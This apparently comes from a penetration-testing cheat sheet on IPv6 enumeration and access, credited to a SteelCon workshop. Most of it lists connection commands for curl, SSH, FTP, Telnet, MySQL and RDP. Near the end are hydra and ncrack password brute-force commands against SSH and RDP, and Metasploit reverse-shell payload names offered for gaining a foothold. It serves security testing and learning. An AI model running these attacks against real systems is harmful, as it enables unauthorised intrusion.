Enumeration
Credit to Roxana Kovaci (https://twitter.com/RoxanaKovaci) and her SteelCon IPv6 workshop
Ping a host
Nmap
Router advertisement
SSH
Access web services
http://[fe80::20c:29ff:fe69:c4e5%eth0]:8888/index.html
Curl
curl -g -6 "http://[fe80::a00:27ff:fe33:498e%eth0]:8080/test.txt" -o test.txt
SNMP
Note: Consider using Enyx (https://github.com/trickster0/Enyx)
SSH over IPv6
ssh -6 user@fe80::30a8:9d3d:3842:8593%eth0
FTP over IPv6
ftp -6 fe80::a00:27ff:fe33:498e%eth0
Telnet over IPv6
telnet -6 fe80::30b8:9d3d:3842:8593%eth0
MySQL over IPv6
mysql -h fe80::30b8:9d3d:3842:8593%eth0 -u user -p pass
RDP over IPv6 on a different port than the default one
rdesktop [fe80::a00:27ff:fe33:498e%eth0]:45001
Password cracking over IPv6
hydra -v -f -6 fe80::20c:29ff:fe69:c4e5%eth0 -l root -P passwords.txt ssh
ncrack -f -6 -v --user admin -P passwords.txt rdp://ipv6-localhost
Reverse connections for getting a foothold
Metasploit framework:
payload/windows/meterpreter/reverse_ipv6_tcp
or
payload/bsd/x86/shell_reverse_tcp_ipv6, etc.